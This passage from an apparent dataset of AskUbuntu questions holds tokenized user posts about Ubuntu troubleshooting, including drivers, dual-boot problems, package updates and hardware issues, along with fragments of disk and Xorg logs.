//smartmontools.sourceforge.net === start of information section === device model : toshiba mk5061gsy serial number : x2kcy12ff lu wwn device id : 5 000039 45d302ace firmware version : mc102e user capacity : 500,107,862,016 bytes [ 500 gb ] sector size : 512 bytes logical/physical device is : not in smartctl database [ for details use : -p showall ] ata version is : 8 ata standard is : exact ata specification draft version not indicated local time is : thu jan 2 10:12:51 2014 cet smart support is : available - device has smart capability . smart support is : enabled === start of read smart data section === smart overall-health self-assessment test result : passed general smart values : offline data collection status : ( 0x82 ) offline data collection activity was completed without error . auto offline data collection : enabled . self-test execution status : ( 249 ) self-test routine in progress ... 90 % of test remaining . total time to complete offline data collection : ( 120 ) seconds . offline data collection capabilities : ( 0x5b ) smart execute offline immediate . auto offline data collection on/off support . suspend offline collection upon new command . offline surface scan supported . self-test supported . no conveyance self-test supported . selective self-test supported . smart capabilities : ( 0x0003 ) saves smart data before entering power-saving mode . supports smart auto save timer . error logging capability : ( 0x01 ) error logging supported . general purpose logging supported . short self-test routine recommended polling time : ( 2 ) minutes . extended self-test routine recommended polling time : ( 121 ) minutes . sct capabilities : ( 0x003f ) sct status supported . sct error recovery control supported . sct feature control supported . sct data table supported . smart attributes data structure revision number : 16 vendor specific smart attributes with thresholds : id # attribute_name flag value worst thresh type updated when_failed raw_value 1 raw_read_error_rate 0x000b 100 100 050 pre-fail always - 0 2 throughput_performance 0x0005 100 100 050 pre-fail offline - 0 3 spin_up_time 0x0027 100 100 001 pre-fail always - 2379 4 start_stop_count 0x0032 100 100 000 old_age always - 1147 5 reallocated_sector_ct 0x0033 027 027 010 pre-fail always - 1497 7 seek_error_rate 0x000b 100 100 050 pre-fail always - 0 8 seek_time_performance 0x0005 100 100 050 pre-fail offline - 0 9 power_on_hours 0x0032 096 096 000 old_age always - 1896 10 spin_retry_count 0x0033 122 100 030 pre-fail always - 0 12 power_cycle_count 0x0032 100 100 000 old_age always - 1041 191 g-sense_error_rate 0x0032 100 100 000 old_age always - 5 192 power-off_retract_count 0x0032 100 100 000 old_age always - 23 193 load_cycle_count 0x0032 098 098 000 old_age always - 23192 194 temperature_celsius 0x0022 100 100 000 old_age always - 48 ( min/max 10/57 ) 196 reallocated_event_count 0x0032 100 100 000 old_age always - 304 197 current_pending_sector 0x0032 100 100 000 old_age always - 0 198 offline_uncorrectable 0x0030 100 100 000 old_age offline - 0 199 udma_crc_error_count 0x0032 200 200 000 old_age always - 0 220 disk_shift 0x0002 100 100 000 old_age always - 128 222 loaded_hours 0x0032 096 096 000 old_age always - 1737 223 load_retry_count 0x0032 100 100 000 old_age always - 0 224 load_friction 0x0022 100 100 000 old_age always - 0 226 load-in_time 0x0026 100 100 000 old_age always - 297 240 head_flying_hours 0x0001 100 100 001 pre-fail offline - 0 smart error log version : 1 no errors logged smart self-test log structure revision number 1 num test_description status remaining lifetime ( hours ) lba_of_first_error # 1 extended offline aborted by host 10 % 1887 - # 2 extended offline aborted by host 90 % 1864 - # 3 extended offline interrupted ( host reset ) 70 % 1863 - # 4 extended offline aborted by host 50 % 1862 - # 5 extended offline aborted by host 50 % 1861 - # 6 extended offline aborted by host 90 % 1860 - # 7 extended offline aborted by host 90 % 1859 - # 8 extended offline completed without error 00 % 1849 - # 9 extended offline completed without error 00 % 1834 - # 10 vendor ( 0x50 ) aborted by host 90 % 1831 - # 11 short offline completed without error 00 % 1831 - # 12 extended offline aborted by host 10 % 1830 - # 13 extended offline completed without error 00 % 1803 - # 14 extended offline completed without error 00 % 1693 - # 15 short offline completed without error 00 % 1690 - # 16 short offline completed without error 00 % 1636 - # 17 vendor ( 0x50 ) completed without error 00 % 929 - # 18 short offline completed without error 00 % 928 - # 19 vendor ( 0x50 ) completed without error 00 % 792 - # 20 short offline completed without error 00 % 792 - # 21 vendor ( 0x50 ) completed without error 00 % 791 - smart selective self-test log data structure revision number 1 span min_lba max_lba current_test_status 1 0 0 not_testing 2 0 0 not_testing 3 0 0 not_testing 4 0 0 not_testing 5 0 0 not_testing selective self-test flags ( 0x0 ) : after scanning selected spans , do not read-scan remainder of disk . if selective self-test is pending on power-up , resume after 0 minute delay . maybe these test reveal some useful information ? thank you !
398983	13.10 no wifi , ethernet , sound or brightness control after trying to install spotify	i 'm relatively new to ubuntu ( and this is my first forum post ) . i upgraded to 13.10 not too long ago and it 's been working fine . the other day i tried to install spotify through terminal using the method posted here . the terminal window froze during the last part of that install so i rebooted and just installed it in my windows partition as a temporary measure . when i tried to use ubuntu the next day , quite a few things had stopped working or had just started behaving weirdly : i can no longer adjust the screen brightness ; it is stuck on full there is no sound ( output is set to dummy output ) i can no longer connect to the internet through either wifi or ethernet ( the network menu says 'no network devices available ' ) the keyboard layout chart has n't changed but some of the keys definitely have ( pressing hash , for example , types a backslash ) for some reason my desktop is now a few pixels wider , i can scroll left and right slightly by putting my cursor at the edge of the screen i have spent a few hours googling this and ca n't seem to get any closer . the main priority is getting the internet working in some way since i suspect this will make the other things easier to fix . if anyone can shed any light on this , that 'd be wonderful . thanks .
398984	backspace shortcut for explorer	how can i access the folder that is used just before in `` files '' using backspace like which is done in windows explorer ? ?
398988	why does `du` on a device reports zero usage ?	output of sudo df -h is filesystem size used avail use % mounted on rootfs 9.2g 5.7g 3.1g 65 % / udev 10m 0 10m 0 % /dev tmpfs 357m 720k 356m 1 % /run /dev/disk/by-uuid/13605893-3936-4fd6-a7f5-e249f16c3f72 9.2g 5.7g 3.1g 65 % / tmpfs 5.0m 4.0k 5.0m 1 % /run/lock tmpfs 2.2g 2.5m 2.2g 1 % /run/shm /dev/sda6 278g 12g 252g 5 % /home whereas sudo du -sh /dev/sd* gives 0 /dev/sda 0 /dev/sda1 0 /dev/sda2 0 /dev/sda5 0 /dev/sda6 o_o
398991	replace win7 w/ win8 after setup w/ ubuntu 13.10 dual boot	my machine now runs dual boot with win 7 and ubuntu 13.10 . i have installed the win 7 first on my pc in c drive then i have installed ubuntu 13.10 in d drive . i used grub 2.0 for dual boot . when i boot my pc i have to select the os i want to login . there are ubuntu and win 7 listed . which i think a screen appeared from ubuntu os . now i want to install a fresh copy of win 8 in c drive . is there any precaution or steps of work should i follow for this installation ? or i install both os again ?
398995	turn an external hard-drive into an internal one ( ubuntu server )	i have an old 1tb external hard drive with enclosure and a new hp proliant g7 n54l 2.2ghz microserver running a freshly installed ubuntu server 12.04 . spec : amd n54l / 2.2ghz 2gb ddr3 sdram hdd 1x 250gb my external hard drive enclosure has recently failed but i have no reason to believe there is a problem with the hard drive ( or it 's contents itself ) . i would like to : retrieve the data on my external hard drive and secure it on my new server add the 1tb hard drive to server so that the total space available is 1250 gb ( probably with raid but i need to read up on this separately ) . how can i add the 1tb external to my hard drive rack so that it 's readable by ubuntu server in order to copy all the data across ? then i would be interested to hear any recommendations or reasoning for a particular hard drive setup ( i 'll be wanting to use this box for a small amount of drupal hosting , owncloud and possibly ftp ) . cheers community !
398997	is it easy to port firefox os apps to ubuntu touch ?	i 'm curious if firefox os apps will be possible to use in ubuntu touch ? will ubuntu touch have a firefox browser anytime soon ? ( seems like the default is webkit at the moment . ) does web apps as first class citizen imply that a web app based os will be easy to port to ubuntu touch ? it 's apparently really easy to install these apps in osx , which is why i 'm asking .
399001	mouse ball is not working on ubuntu	i am using ubuntu on virtual box . mouse key click is working well but , the mouse ball is not working for up and down operations . please suggest if you have similar problem .
399006	install ubuntu with windows 8 on seperate partition	i am trying to install ubuntu with windows8 -dual boot , but i want to install ubuntu on separate partition , like my windows 8 installed on c drive and i want to install ubuntu on d drive . tell me the installation steps .
399011	installation of wps office on ubuntu software center cause the system to freeze	on xubuntu i installed wps office through some other program instead of software center . it made my system unresponsive and since i did n't know reisub command , i cold rebooted.now again i have installed xubuntu and tried installing wps office again with ubuntu software center . it got installed . after about 10 minutes of clicking install , the theme changed to basic like windows 98 . it got 99 % unresponsive . timer stopped and stuck at some hh : mm . not a minute changed since then . i thought to wait about an hour and proceed with the known command . it stayed frozen for about 45 more minutes and i lost it.i did reisub as ctrl+alt+bspace was also not working . it booted up but with half black & grey screen . i did reisub again and came back to my desktop with wps installed and working fine with no issues . but still why that happened ? is that have to do anything with hardware ? i have intel core 2 duo ( purchased in 2009 ) , 1gb ram , 128mb graphics memory . does anyone have any idea what can be the problem ?
399014	unable to adjust brightness in hp dv6 1256tx ubuntu 13.10 32bit	tried the steps mentioned in i can not change the screen brightness , but did not work : ( ( these steps might be only for ubuntu 12.04 ? ? ) info on graphics : gallium 0.4 on amd rv710
399016	unable to copy vlc skin to skins2 file	way new to xubuntu ( installed it monday ) , so i appreciate any help you can give me . when i attempt to download a skin ( crux , in fact ) directly to vlc 's skins2 file , the download does n't take place . when i download the same skin to the downloads file , that works fine , but i ca n't then copy the file from downloads to vlc 's skins2 file . i 've also tried to extract the information to the skins2 file from downloads , but i get told that i do n't have permission to do that . i 'm thinking that a ) i have the wrong destination file somehow or b ) that skin may not work with xubuntu . how close am i ? thanks in advance . kiloseven , i 'm not sure what you 're looking for . the path i have for the skins2 file is : /usr/share/vlc/skins2/ thanks for answering .
399018	amd driver conflicting with skype - what do ?	i recently got a new graphics card , an amd hd 7770 . it works fine , but the graphics driver conflicts with skype , which i need for work . it seems the package at fault is libqtgui4 : i386 , which can not run along with the amd64 version , which the driver depends on . i have tried installing earlier versions , tried different drivers , but nothing works . what do i do ?
399021	windows does n't boot after installing ubuntu . returns to grub menu	i 'm new to ubuntu 12.04 . i installed windows xp ( sp3 ) first , then ubuntu alongside . ubuntu boots well but when i choose win xp from the boot menu it goes to a black screen and then returns to the boot menu i performed boot-repair and get this log . boot summery log form boot-repair but this did n't solve my problem and do n't know what can i do . update : i tried to run the fixmbr command to recover the boot record . i inserted windows xp cd and booted from cd , but it does n't sense my windows installation . update recovery console wo n't load to press r for repair boot sector
399025	how to scan my flash drives for windows viruses while on linux ? ( not clamav )	i know that maybe it sounds like a duplicate but it is n't because i see that the other questions describe totally different situations than mine . apart from the other users , i do n't have a windows partition on my netbook ( yes , i am a newbie but i had the courage to `` forget '' about windows ) and i do n't have any cd-rw drive on it . so i do n't need to scan my windows partition from ubuntu neither i can use any antivirus cd like some people recommend . my problem is , i hope , simpler . i use a lot of flash drives to store data , and i have used it since my `` windows times '' . but now i have become unaware of the possible viruses that can be `` stored '' on it . yesterday i have plugged in several of my flash drives on a freshly installed windows xp system with an up-to-date avast ! antivirus on it , and the antivisrus has discovered a dizzying number of viruses on my flash drives ! while this does n't affect me , it may affect others , because all of my friends are windows users and they always call me to help them solve pc-related problems . so , i ca n't go to them and , unwillingly , `` flood '' their systems with viruses instead of helping them . so i really need to keep my flash drives clean just in case . note . i do n't think that using a windows system to scan them is a good solution , although it might sound to be the easiest and most obvious . my mother 's pc runs windows xp but is an old pc , tricky and unreliable because it falls all the time . clamav is not an option for me as i have a very bad experience related to it . i have used it in the spring to scan a windows partition ( on a dual boot pc ) and the result was a total mess and i had to reinstall both operational systems again . since that day , i simply hate clamav as i am convinced that it erases even good and clean files and all it does is just a mess . so , if you have a a solution apart of those two and keeping in mind my lack of cd drive , then your advice would be very much appreciated .
399030	how to check implementation details of 'watch ' command ?	to maximise learning i ended up cloning whole linux source code from github . i wanted to check how 'watch ' command is implemented in it , but code is just too vast to return anything useful when i try to grep 'watch ' . i was wondering if any of you can help .
399035	connect to mysql database on ubuntu host from windows guest	i have ubuntu 12.04 on my laptop and have a windows 7 guest on ( vmware ) . i would like to connect to the mysql database on ubuntu host from windows guest.kindly tell me how to do the same . i have tried the odbc test connection but no success . my current state is as below i am able to ssh to the host ip address ( given against the vmnet1 - output of ifconfig command on ubuntu ) and ping from windows to ubuntu host by giving ubuntu machine name . i understand that i need to comment the bind-address parameter in my.cnf and i did the same . now my question : now , i need to execute a statement in mysql server something similar to grant all privileges on . to username @ address identified by password ; i am not sure what should be the value for the address as dhcp enabled on my guest ( not sure what ip to give if i need to change this to a fixed ip ) apart from this i also would like to know what is the approach for setting up a firewall for mysql server ( as commented the bind-address ) any gui tools for this with out causing any additional problems ?
399038	no video on ubuntu trial from livedvd	i would like to try ubuntu , without changing my set-up . i have prepared a dvd with ubuntu-13.10-desktop-i386.iso . booting works fine , but monitor stays black . graphic card is ati mobility radeon x700 . could the graphic card be the problem , maybe a missing driver ?
399039	unable to install the kernel 3.5 in ubuntu 12.04	i am using ubuntu 12.04 and it 's kernel version is `` 3.8.0-29-generic '' . for learning purposes i want to change my kernel version from 3.8.o to 3.5.0 version , but i am unable to install it in ubuntu 12.04 . i followed these steps for kernel compilation : after downloading source code from kernel.org i followed these steps : tar -xvf linux-3.5.tar.xz cd linux-3.5/ ls make menuconfig make -j make modules_install sudo make modules_install sudo make install make modules sudo reboot after successful completion of all these steps , ubuntu is again starting with kernel 3.8.0 generic version . how can i change it ?
399044	update interrupted , now ca n't update ubuntu 12.04	i 've installed ubuntu 12.04 . while i was updating it there was an internet interruption . now i 'm unable to update , upgrade and install any app/program through terminal/software center ( by connecting internet ) . is there any way that i can overcome this problem ?
399045	packages not updating	while updating my system , something went wrong and now i have 275 packages that refuse to update . at the end of each one , it says ( -11 - system error ) and they all say that they failed to fetch a certain url . any ideas ?
399048	dual boot issues - windows 8 is corupt and ca n't run recovery	a little help plz.. so , i bought a touch screen laptop to install dual boot with ubuntu and windows and install cloudera to do some development . i had issues with setting up dual boot and ran into issue where ubuntu did n't detect my windows so i had to use something else install option . finally had ubuntu 12.10 installed with grub working and could dual boot . well cloudera is only supported on ubuntu 12.04 so i created another liveusb boot and installed 12.04 over 12.10 . during install 3 options came up , i picked the option to install over ubuntu . so then my laptop would only boot into ubuntu , ran boot-repair and now i see option to boot into windows but it is failing . i tried factory restore and it says required partition is missing . i see all the partitions in gparted . not sure how to fix this . any help would be great . http : //paste.ubuntu.com/6677061/ thanks , carlo
399049	teamviewer9 autostart on ubuntu 13.10	i tried to put teamviewer9 ( v9.0.24147 32-bit / multiarch ) in the `` startup applications '' for a graphical gui , and even in ~/.config/autostart and created the .desktop file manually . teamviewer opens a window on startup the teamviewer daemon is not running ... . i have also tried the command gnome-terminal -e teamviewer but i get the same error message . if i start teamviewer manually in the terminal , all works fine . i ca n't figure out the problem , anybody could help ?
399055	help getting atv remote to work with xbmc	i am new to ubuntu and terminal commands . i am trying to get my apple tv remote to work with my xbmc install on ubuntu 12.04 or a xbmcbuntu install . i have tried using lirc but do n't understand how to configure it properly . any help would be greatly appreciated .
399056	problem with screen brightness	i'am using ubuntu 13.04 on lenovo g500 -e when i turn my laptop computer on the brightness of screen is 0 and i need to increase the brightness to see the screen is this problem related to ubuntu 13.04 ? please help me to solve this problem thanks in advance ,
399061	how to use 32-bits libraries in 64-bits r ?	i built a server with ubuntu 64-bit and installed r 64-bit and a function.so 32bit library , every time i try to load this library in r , it shows me this error : wrong elf class : elfclass32 is there any way to rotate a 32-bit library in 64-bit r ?
399062	running a script from a keybinding	i 've written two small scripts to change my monitor configurations . when i run these scripts from the terminal they work perfectly , however i do n't seem to be able to get them to work with keybinds . i 'm using ctrl+shift+f11 and ctrl+shift+f12 for my binds , and if i set one of these for example to run `` gnome-terminal '' it works as expected . however , when i try and run one of my scripts , nothing happens . my script is located in `` ~/.dotfiles/local/scripts/outputdvi0-1.sh '' and this is the exact command i 've placed in the command section of the key binding . is there something i 'm missing here ?
399063	how can i determine what is blanking my screen ?	i have a laptop running ubuntu 13.04 which drives a monitor in the hallway in our office . i use a scheduled task to turn the monitor on and off each day when people are out of the office . at the end of the day , a scheduled task runs `` xset dmps force standby '' and first thing in the morning another task runs `` xset dpms force on '' . the problem i have is that every morning we come in and the monitor is on , but it 's just showing a blank ( solid black ) screen . i have to remote desktop into the machine to really wake up the screen . these commands work great when i just run them to test . for example , if i run the following from the commandline `` xset dpms force standby & & sleep 5 & & xset dpms force on '' , i see exactly the behavior i want . the screen goes to sleep , waits 5 seconds , and then wakes up . it 's just when the machine actually sits over night that it fails . i 've tried telling the screen not to blank everywhere i could find ( i.e . the xscreensaver-demo ui , the power , and lock options ) . i also checked `` xset q '' and it looks like the dpms values there are all set to 0 . is there any way for me to figure out what is blanking my screen ?
399065	how can i create new language layout in ubuntu ?	i need a tutorial tour about creating a new language layout with a different name for ubuntu , downloadable for all and which everyone can install them on their ubuntu os . i was searched on internet for this tutorial and i found 2 tutorials , but those are not clear and not for beginners .
399067	ca n't access windows shares since upgraing to 13.10	upgrading to 13.10 was a big mistake . finally got everything working except accessing shares from my windows server . apparently the same applications and configuration that were used in 13.04 no longer work in 13.10 . installed samba as before but got various errors and no samba app . installing samba from the software center was also a waste of time . any help would be greatly appreciated .
399071	kernel panic on boot up with 13.10 live-usb	i am a new user for ubuntu . i downloaded 13.10 yesterday and made a bootable usb with universal usb installer on my lenovo ideapad z580 laptop which is now using uefi ; everything appeared ok . when i booted from the liveusb i got the choices of trying or installing ubuntu but both of them keep giving me these error : [ 1.929082 ] kernel panic-not syncing vfs unable to mount root fs on unknown-block ( 0.0 ) please tell me what is going wrong ?
399081	how to upgrade my ubuntu 13.04 to 13.10	how can i upgrade my ubuntu version to 13.10 . my current ubuntu version is 13.04 .
399088	i ca n't read in burmese in firefox !	i ca n't read in burmese in firefox . what can i do ? please help me .
399090	adding icon-counter to gnome desktop for ubuntu 12.10	i am looking at displaying a counter or display a variable number as a desktop icon for gnome in ubuntu 12.10 . i have a computer program that is running through a bunch of files and will likely take a few weeks to complete . as it is doing this i want some kind of indication on the desktop to see how many files have been processed . i was hoping to use a count-badge over an icon but have n't found anything online if it is possible . is there way of somehow displaying a variable number on the gnome desktop that updates everytime a script runs ? i have tried the command < > but i am looking for something less intrusive that i have do n't have to click every 10 minutes . thanks in advance .
399091	automatic packages installer	is there any method to install all packages with just one click ! included ( .deb ) ( .tar.gz ) ( .tar.gz2 ) ( .tgz ) cause i wan na install a lot of things and i got problems like hen installing aircrack-ng python-scapy python qt4 python subversion xterm reaver ( for wps attacks )
399092	confusion regarding web owner in /var/www and local copy of project /home/user/project	i have installed the symfony2 framework . i cloned my ( git ) repository in /var/www as well as locally in /home/username/myproject . in there ( myproject ) is where i make and test changes and commit to the project to the repository where then i will pull the changes in /var/www . i am confused because the owner of the /var/www files is root . in my local repository ( /home/username/myproject ) , the owner is root as well . this means that , when i am using ftp , i can not change anything because i am not signed in as root . i assume now that i have to add myself ( username ) as owner of that entire project ( recursively ) in /home/username/projects . then , before i commit everything to the repository , change all the files back to root as owner , and then commit it . however , is this the ''ideal '' solution ? or is there another way i am not getting to do this ?
399095	xfce shortcut wo n't launch firefox w/ intel flash support , cli command will	one can start firefox with flash support by intel graphics cards/chips from the terminal via vdpau_driver=va_gl firefox however i 'd like to do that from a shortcut in my xfce panel ( little screenshot of panel ) . so i simply thought of editing the command but that does n't work . how can i achieve that ? ( if others are interested in this , you could check out this post on webup8.org . )
399097	64bit packages being removed when installing skype/teamviewer	i am on ubuntu 12.10 and when i try to install skype i get the expected message about missing dependencies and when i run sudo apt-get install -f i get this the following extra packages will be installed : lib32asound2 lib32z1 libc6-i386 suggested packages : lib32asound2-plugins the following packages will be removed : libdbusmenu-qt2 libphonon4 libqt4-declarative libqt4-designer libqt4-help libqt4-opengl libqt4-qt3support libqt4-scripttools libqt4-sql-mysql libqt4-svg libqt4-test libqtgui4 libqtwebkit4 musique phonon phonon-backend-gstreamer python-qt4 qt-at-spi retext sni-qt sqlitebrowser teamviewer virtualbox-4.3 vlc the following new packages will be installed : lib32asound2 lib32z1 libc6-i386 that removes my vlc , musique and bunch of other qt stuff i know i did something wrong along the way . but what ? thanks
399098	downloading files from bandcamp	i try to find way to download bandcamp music , and i mean to download music i paid for . i want to download albums i bought on bandcamp to my server . i got acces via ssh . i tried to use wget but donwload link from bandcamp is not direct and wget does not work . link is in strange format finished with no extension , i guess wget needs *.rar . is there any way to do it ?
399100	ubuntu 12.04 lts runs very much slower than 9.04	i have installed ubuntu 12.04 lts , and it really runs too slow , a lot slower than my previously used 9.04 jaunty . my system specs : 32 bit 767 mb ram cpu = amd athlon , 1050 mhz motherboard clock = 33 mhz besides that there is a problem with the terminal window : it gets transparent or whitened out much . am i missing some updates for these errors ?
399103	how can we setup startup tasks	in windows we can add applications/batch scripts to open automatically on startup . is there something similar in ubuntu , or linux in general ?
399109	gnome search tools	i 'm running ubuntu 13.10 , but with the gnome fallback environment . i remember seeing someone being able to press tab , and have a `` results as you go type '' search function . how do i do that in gnome fallback ?
399110	dual boot issues with windows 8 and ubuntu 12.04	i have installed ubuntu 12.04 on sony vaio with preloaded windows8 . i allocated a space of 16gb seperately without creating a new volume and then put the ubuntu installation disc.i had to boot in uefi for using windows , and legacy boot mode for using ubuntu . everything was fine until a few days , then the issue starts : both the os became too slow and the partition editor shows that ubuntu was loaded in the partition of windows itself.. now i formatted that allocated space of ubuntu partition from windows itself ( normal ntfs format ) inorder to reinstall ubuntu . even though after the format , i get a prompt to chose the os at boot time . i dont exactly understand the problem ... please help me out .
399116	problems with gtk	i started working on a project where i need to make a simple interface with c language using gtk , then i need to connect that interface with linux system , i started working with `` glade '' witch is an `` interface designer '' the problem is , when the code is generated , it does compiles , but no execution is happening . i do n't see my interface opened or nothing . i wish you can help me to clarify my ideas because i 'm still confused , and i wish you can send me an example of an interface with its source code in c so i can have something working . thank you very much !
399132	change icon for .bin file	i have downloaded sqlite studio .bin file . after i made it executable and start it , icon is pretty disappointing . because of that , i got another .png icon from the web . changing icon in properties of .bin file works , but only temporary , when app is started , there 's still same ugly icon in unity and alt+tab window . even creating application entry in ./local/share/applications/sqlitestudio.desktop with icon path to /opt/sqlitestudio/icon.png does n't work ... i find it in unity search , icon is good there , but again , after starting application , same old ico . what can i do ? it 's ubuntu 12.04 lts . thanks
399133	how to install arm-none-eabi-gdb , gdb , openocd , gcc for stm32 toolchain ?	trying to install a toolchain for an stm32f4 discovery eval board . any hints about doing this ? sudo apt-get install arm-none-eabi-gdb if at all possible i would like to avoid using an ide . so that i can get the hang of the basics . leaning towards using dfu-util or texane st-link
399136	mac touchpad firefox problem	i have a problem with my mac . it does n't answer the multi-touch clicks in firefox on ubuntu . but i need to use it in mall for customers , so what is the way to make it works for browser ( touch-pad is ok , i already tried to test it settings ) , but it does n't even go through the links if i touch , but with mouse it is ok .
399138	upgrade sony vaio laptop from windows me to ubuntu	what is the recommended version of ubuntu to use to upgrade from windows me on the sony vaio laptop ?
399139	black screen when booting ubuntu after grub	so i installed ubuntu 13.10 as the primary os on my laptop . i installed windows 8 in another partition and set up grub to be the boot loader . eventually i updated windows and it became a black screen so i reinstalled windows in that partition . somehow doing this removed windows from grub 's menu and so i tried to reinstall grub which i had a little trouble doing . i tried it a few different ways , one of them was booting from a livecd and involved mounting and unmounting things ( did this pretty much blindly as i do n't have a lot of the know how ) . that did n't work but i came across the standard boot-repair program and it worked fine . the big problem i have no is that ubuntu does not load after selecting it from grub . it just hangs at a black screen . when i select recovery mode , it goes to the menu . when i resume the normal boot , it reads out : ubuntu 13.10 denjay-laptop tty1 denjay-laptop login : _ with a flashing underscore . after a few seconds it then adds to that line initct1 : event failed i also checked all the file systems with the recovery mode and with a livecd and nothing was anomalous on that end . i 've also gone through updating grub so i think something wrong post-grub if that makes sense . i heard that it might be a video card problem so i tried nomodeset which still resulted in a black screen . one user had too many drivers installed on their card and they input dpkg -- get-selections nvidia-* to show their drivers . my laptop has `` amd a8 3520m apu with radeon tm hd graphics '' and i 'm not sure what the driver package name for that is . so what should i replace nvidia with for to get the driver ? any help would be greatly appreciated .
399145	usb removed too early - gui not loading	i 'm running a dual boot ( 13.10 and windows 8 ) ... and after removing an usb stick too early ( in ubuntu ) , the gui is n't loading at startup on both oss ... i can only access the ubuntu gui by starting the tty , logging in as root and then using startx . is there a way of restoring the guis ?
399147	how to recursive regexp rename double dashes	i am using wordpress eazyest gallery to create 2000 galleries . some files have double or triple dashes in filenames . for instance : abc -- -def.jpg these files are uploaded via ftp . on wordpress admin and front end html 's they get replaced , this file gets the name abc-def.jpg so they become broken links / src 's . is there a way i can replace all -- - 's or -- 's in a folder with a single - character using ssh ? i am on ubuntu 12.04 .
399150	my computer wont install ubuntu after i nuked my laptop	i recently nuked my laptop with dban so i can install ubuntu . i put the disk and it shows ubuntu and let me choose install or test it out but no matter what is choose it stays at the ubuntu loading screen but never loads up . specs ubuntu 12.04 acer laptop
399153	after apt-get upgrade system always boot to low-graphics mode	some time ago i have installed xorg edgers nvidia 331 drivers for my nvidia 420m with ubuntu 13.10 . today i have run like always sudo apt-get update & & sudo apt-get upgrade -y & & sudo apt-get dist-upgrade -y and after that my laptop always boots into low-graphics mode prompt to ask whether to troubleshoot the problem , check logs , etc . but even after marking boot into low graphics mode it never does ( it hangs in x but i can still ctrlaltf1-6 . i have uninstalled my graphics drivers after that , reinstalled them ( the same effect ) . removed xorg edgers ppa , installed nvidia-319 drivers ( the same ) . always low-graphics mode . i have also had problems with 3.12 kernel that i have installed ( manually from kernel.org but after i have completely removed them and upgraded grub there is now problem with the drivers . ) i attach xorg.0.log [ 9.912 ] x.org x server 1.14.5 release date : 2013-12-12 [ 9.912 ] x protocol version 11 , revision 0 [ 9.912 ] build operating system : linux 3.2.0-37-generic x86_64 ubuntu [ 9.912 ] current operating system : linux icanseeyou 3.11.0-15-generic # 23-ubuntu smp mon dec 9 18:17:04 utc 2013 x86_64 [ 9.912 ] kernel command line : boot_image=/boot/vmlinuz-3.11.0-15-generic root=uuid=cd852128-b5f9-4c66-82c0-08ffd489da5d ro persistent quiet splash [ 9.912 ] build date : 17 december 2013 10:06:15am [ 9.912 ] xorg-server 2:1.14.5-1ubuntu2~saucy1 ( for technical support please see http : //www.ubuntu.com/support ) [ 9.912 ] current version of pixman : 0.30.2 [ 9.913 ] before reporting problems , check http : //wiki.x.org to make sure that you have the latest version . [ 9.913 ] markers : ( -- ) probed , ( ** ) from config file , ( == ) default setting , ( ++ ) from command line , ( ! ! ) notice , ( ii ) informational , ( ww ) warning , ( ee ) error , ( ni ) not implemented , ( ? ? ) unknown . [ 9.913 ] ( == ) log file : `` /var/log/xorg.0.log '' , time : thu jan 2 22:53:36 2014 [ 9.913 ] ( == ) using config file : `` /etc/x11/xorg.conf '' [ 9.913 ] ( == ) using system config directory `` /usr/share/x11/xorg.conf.d '' [ 9.913 ] ( == ) serverlayout `` layout0 '' [ 9.913 ] ( ** ) | -- > screen `` screen0 '' ( 0 ) [ 9.913 ] ( ** ) | | -- > monitor `` monitor0 '' [ 9.913 ] ( ** ) | | -- > device `` device0 '' [ 9.913 ] ( ** ) | -- > input device `` keyboard0 '' [ 9.913 ] ( ** ) | -- > input device `` mouse0 '' [ 9.913 ] ( == ) automatically adding devices [ 9.913 ] ( == ) automatically enabling devices [ 9.913 ] ( == ) automatically adding gpu devices [ 9.913 ] ( ww ) the directory `` /usr/share/fonts/x11/cyrillic '' does not exist . [ 9.913 ] entry deleted from font path . [ 9.913 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi/ '' does not exist . [ 9.913 ] entry deleted from font path . [ 9.913 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi/ '' does not exist . [ 9.913 ] entry deleted from font path . [ 9.913 ] ( ww ) the directory `` /usr/share/fonts/x11/100dpi '' does not exist . [ 9.913 ] entry deleted from font path . [ 9.913 ] ( ww ) the directory `` /usr/share/fonts/x11/75dpi '' does not exist . [ 9.913 ] entry deleted from font path . [ 9.913 ] ( == ) fontpath set to : /usr/share/fonts/x11/misc , /usr/share/fonts/x11/type1 , built-ins [ 9.913 ] ( == ) modulepath set to `` /usr/lib/x86_64-linux-gnu/xorg/extra-modules , /usr/lib/xorg/extra-modules , /usr/lib/xorg/modules '' [ 9.913 ] ( ww ) hotplugging is on , devices using drivers 'kbd ' , 'mouse ' or 'vmmouse ' will be disabled . [ 9.913 ] ( ww ) disabling keyboard0 [ 9.913 ] ( ww ) disabling mouse0 [ 9.913 ] ( ii ) loader magic : 0x7fd9888bfd20 [ 9.913 ] ( ii ) module abi versions : [ 9.913 ] x.org ansi c emulation : 0.4 [ 9.913 ] x.org video driver : 14.1 [ 9.913 ] x.org xinput driver : 19.1 [ 9.913 ] x.org server extension : 7.0 [ 9.914 ] ( -- ) pci : * ( 0:1:0:0 ) 10de:0df1:1025:0487 rev 161 , mem @ 0xb2000000/16777216 , 0xa0000000/268435456 , 0xb0000000/33554432 , i/o @ 0x00003000/128 , bios @ 0x ? ? ? ? ? ? ? ? /524288 [ 9.915 ] ( ii ) open acpi successful ( /var/run/acpid.socket ) [ 9.915 ] initializing built-in extension generic event extension [ 9.915 ] initializing built-in extension shape [ 9.915 ] initializing built-in extension mit-shm [ 9.915 ] initializing built-in extension xinputextension [ 9.915 ] initializing built-in extension xtest [ 9.915 ] initializing built-in extension big-requests [ 9.915 ] initializing built-in extension sync [ 9.915 ] initializing built-in extension xkeyboard [ 9.915 ] initializing built-in extension xc-misc [ 9.915 ] initializing built-in extension security [ 9.915 ] initializing built-in extension xinerama [ 9.915 ] initializing built-in extension xfixes [ 9.915 ] initializing built-in extension render [ 9.915 ] initializing built-in extension randr [ 9.915 ] initializing built-in extension composite [ 9.915 ] initializing built-in extension damage [ 9.915 ] initializing built-in extension mit-screen-saver [ 9.915 ] initializing built-in extension double-buffer [ 9.915 ] initializing built-in extension record [ 9.915 ] initializing built-in extension dpms [ 9.915 ] initializing built-in extension x-resource [ 9.915 ] initializing built-in extension xvideo [ 9.915 ] initializing built-in extension xvideo-motioncompensation [ 9.915 ] initializing built-in extension selinux [ 9.915 ] initializing built-in extension xfree86-vidmodeextension [ 9.915 ] initializing built-in extension xfree86-dga [ 9.915 ] initializing built-in extension xfree86-dri [ 9.915 ] initializing built-in extension dri2 [ 9.915 ] ( ii ) `` glx '' will be loaded by default . [ 9.915 ] ( ww ) `` xmir '' is not to be loaded by default . skipping . [ 9.915 ] ( 